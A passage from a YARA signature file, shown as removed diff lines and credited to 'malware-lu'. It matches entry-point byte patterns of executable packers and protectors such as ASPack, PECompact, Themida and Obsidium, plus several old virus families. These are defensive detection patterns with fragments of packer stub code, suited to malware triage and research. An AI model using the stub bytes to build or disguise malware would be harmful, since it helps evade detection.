-	$a1 = { E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A 41 00 8B 4A 64 89 8D 51 1A 41 00 8B 4A 74 89 8D 59 1A 41 00 68 00 20 00 00 E8 D2 00 00 00 50 8D 8D 00 1C 41 00 50 51 E8 1B 00 00 00 83 C4 08 58 8D 78 74 8D B5 49 1A 41 00 B9 18 00 00 00 F3 A4 05 A4 00 00 00 50 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 4D 1A 41 00 89 44 24 1C 61 C2 04 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule FixupPakv120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 00 00 00 00 5D 81 ED ?? ?? 00 00 BE 00 ?? 00 00 03 F5 BA 00 00 ?? ?? 2B D5 8B DD 33 C0 AC 3C 00 74 3D 3C 01 74 0E 3C 02 74 0E 3C 03 74 0D 03 D8 29 13 EB E7 66 AD EB F6 AD EB F3 AC 0F B6 C8 3C 00 74 06 3C 01 74 09 EB 0A 66 AD 0F B7 C8 EB 03 AD 8B C8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ARCSFXArchive
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C C8 8C DB 8E D8 8E C0 89 ?? ?? ?? 2B C3 A3 ?? ?? 89 ?? ?? ?? BE ?? ?? B9 ?? ?? BF ?? ?? BA ?? ?? FC AC 32 C2 8A D8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MoleBoxv230Teggo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 42 04 E8 ?? ?? 00 00 A3 ?? ?? ?? 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 ?? 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC CC CC CC CC CC CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 20 61 58 FF D0 E8 ?? ?? 00 00 CC CC CC CC CC CC CC }
-
-condition:
-		$a0
-}
-	
-	
-rule VxIgor
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E B8 CD 7B CD 21 81 FB CD 7B 75 03 E9 87 00 33 DB 0E 1F 8C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FACRYPTv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B9 ?? ?? B3 ?? 33 D2 BE ?? ?? 8B FE AC 32 C3 AA 49 43 32 E4 03 D0 E3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01WATCOMCCEXEAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 90 90 90 90 57 41 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV115V117aPlib043ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 45 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EmbedPEv113cyclotron
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXcaliburv103forgotus
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 20 45 78 63 61 6C 69 62 75 72 20 28 63 29 20 62 79 20 66 6F 72 67 6F 74 2F 75 53 2F 44 46 43 47 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petite14
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }
-
-condition:
-		$a0
-}
-	
-	
-rule Petite12
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petite13
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 }
-
-condition:
-		$a0
-}
-	
-	
-rule Upack021betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 40 00 AD 8B F8 6A 04 95 A5 33 C0 AB 48 AB F7 D8 59 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WebCopsEXELINKDataSecurity
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 05 EB 02 EB FC 55 EB 03 EB 04 05 EB FB EB 53 E8 04 00 00 00 72 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02FSG10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThemidaOreansTechnologies2004
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxNumberOne
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F9 07 3C 53 6D 69 6C 65 3E E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WinKriptv10MrCrimson
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 83 C0 08 EB D5 61 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv085f
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RosAsm2050aBetov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 60 8B 5D 08 B9 08 00 00 00 BF ?? ?? ?? ?? 83 C7 07 FD 8A C3 24 0F 04 30 3C 39 76 02 04 07 AA C1 EB 04 E2 EE FC 68 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 61 8B E5 5D C2 04 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Obsidium13021ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv211dAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv211cAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtect14xRISCOsoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 }
-
-condition:
-		$a0
-}
-	
-	
-rule SplashBitmapv100BoBBobsoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEZipv10byBaGIE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { D9 D0 F8 74 02 23 DB F5 F5 50 51 52 53 8D 44 24 10 50 55 56 57 D9 D0 22 C9 C1 F7 A0 55 66 C1 C8 B0 5D 81 E6 FF FF FF FF F8 77 07 52 76 03 72 01 90 5A C1 E0 60 90 BD 1F 01 00 00 87 E8 E2 07 E3 05 17 5D 47 E4 42 41 7F 06 50 66 83 EE 00 58 25 FF FF FF FF 51 }
-
-condition:
-		$a0
-}
-	
-	
-rule LamerStopv10ccStefanEsser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 05 ?? ?? CD 21 33 C0 8E C0 26 ?? ?? ?? 2E ?? ?? ?? 26 ?? ?? ?? 2E ?? ?? ?? BA ?? ?? FA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtectV14Xrisco
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 7C 83 04 24 06 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxGRUNT2Family
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 48 E2 F7 C3 51 53 52 E8 DD FF 5A 5B 59 C3 B9 00 00 E2 FE C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeMicrosoftVisualC70FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 89 65 00 8B F4 89 3E 56 FF 15 ?? ?? ?? ?? 8B 4E ?? 89 0D ?? ?? ?? 00 8B 46 00 A3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InstallStub32bit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 14 ?? 00 00 53 56 57 6A 00 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 29 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VcasmProtector10evcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 0A 5B 56 50 72 6F 74 65 63 74 5D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePEBundle20x24xemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 83 BD 9C 38 40 00 01 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov190b4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 08 E2 40 00 68 B4 96 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXv103v104Modified
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPackV2XLiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6E 73 70 61 63 6B 24 40 }
-
-condition:
-		$a0
-}
-	
-	
-rule ThemidaWinLicenseV1000V1800OreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PACKWINv101p
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C C0 FA 8E D0 BC ?? ?? FB 06 0E 1F 2E ?? ?? ?? ?? 8B F1 4E 8B FE 8C DB 2E ?? ?? ?? ?? 8E C3 FD F3 A4 53 B8 ?? ?? 50 CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 28 63 40 ?? 87 DD 8B 85 AD 63 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MicroJoiner15coban2k
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF 05 10 40 00 83 EC 30 8B EC E8 C8 FF FF FF E8 C3 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ANDpakk2018byDmitryANDAndreev
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC BE D4 00 40 00 BF 00 ?? ?? 00 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 94 60 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b5
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 49 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NJoy10NEX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 9C 3B 40 00 E8 8C FC FF FF 6A 00 68 E4 39 40 00 6A 0A 6A 00 E8 40 FD FF FF E8 EF F5 FF FF 8D 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b7
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB 14 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv110b6
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 ?? 00 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB B7 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule KBysPacker028BetaShoooo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5E 83 EE 0A 8B 06 03 C2 8B 08 89 4E F3 83 EE 0F 56 52 8B F0 AD AD 03 C2 8B D8 6A 04 BF 00 10 00 00 57 57 6A 00 FF 53 08 5A 59 BD 00 80 00 00 55 6A 00 50 51 52 50 89 06 AD AD 03 C2 50 AD 03 C2 FF D0 6A 04 57 AD 50 6A 00 FF 53 }
-
-condition:
-		$a0
-}
-	
-	
-rule nPack113002006BetaNEOx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 9C 00 00 00 E8 2D 02 00 00 E8 DD 06 00 00 E8 2C 06 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02BorlandC1999Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 A1 ?? ?? ?? ?? A3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv100bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SEAAXEv22
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC BC ?? ?? 0E 1F A3 ?? ?? E8 ?? ?? A1 ?? ?? 8B ?? ?? ?? 2B C3 8E C0 B1 03 D3 E3 8B CB BF ?? ?? 8B F7 F3 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PureBasic4xDLLNeilHodgson
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 75 0E 8B 44 24 04 A3 ?? ?? ?? 10 E8 22 00 00 00 83 7C 24 08 02 75 00 83 7C 24 08 00 75 05 E8 ?? 00 00 00 83 7C 24 08 03 75 00 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? 0F 00 00 A3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEPackerv70byTurboPowerSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 06 8C C3 83 ?? ?? 2E ?? ?? ?? ?? B9 ?? ?? 8C C8 8E D8 8B F1 4E 8B FE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxSYP
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 47 8B C2 05 1E 00 52 8B D0 B8 02 3D CD 21 8B D8 5A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DSHIELD
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 E8 ?? ?? 5E 83 EE ?? 16 17 9C 58 B9 ?? ?? 25 ?? ?? 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kkrunchy023alphaRyd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 8D 9D A0 08 00 00 E8 ?? 00 00 00 8B 45 10 EB 42 8D 9D A0 04 00 00 E8 ?? 00 00 00 49 49 78 40 8D 5D 20 74 03 83 C3 40 31 D2 42 E8 ?? 00 00 00 8D 0C 48 F6 C2 10 74 F3 41 91 8D 9D A0 08 00 00 E8 ?? 00 00 00 3D 00 08 00 00 83 D9 FF 83 F8 60 83 D9 FF 89 45 10 56 89 FE 29 C6 F3 A4 5E EB 90 BE ?? ?? ?? 00 BB ?? ?? ?? 00 55 46 AD 85 C0 74 ?? 97 56 FF 13 85 C0 74 16 95 AC 84 C0 75 FB 38 06 74 E8 78 ?? 56 55 FF 53 04 AB 85 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NJoy12NEX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 A4 32 40 00 E8 E8 F1 FF FF 6A 00 68 54 2A 40 00 6A 0A 6A 00 E8 A8 F2 FF FF E8 C7 EA FF FF 8D 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiDote12DemoSISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 F7 FE FF FF 05 CB 22 00 00 FF E0 E8 EB FE FF FF 05 BB 19 00 00 FF E0 E8 BD 00 00 00 08 B2 62 00 01 52 17 0C 0F 2C 2B 20 7F 52 79 01 30 07 17 29 4F 01 3C 30 2B 5A 3D C7 26 11 26 06 59 0E 78 2E 10 14 0B 13 1A 1A 3F 64 1D 71 33 57 21 09 24 8B 1B 09 37 08 61 0F 1D 1D 2A 01 87 35 4C 07 39 0B }
-
-condition:
-		$a0
-}
-	
-	
-rule EXE32Packv137
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED 4C 8E 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXE32Packv136
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED CC 8D 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AINEXEv230
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0E 07 B9 ?? ?? BE ?? ?? 33 FF FC F3 A4 A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded20XJitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptorv151x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 C1 ?? ?? ?? FE C3 31 C0 64 FF 30 64 89 20 CC C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidiumv1304ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }
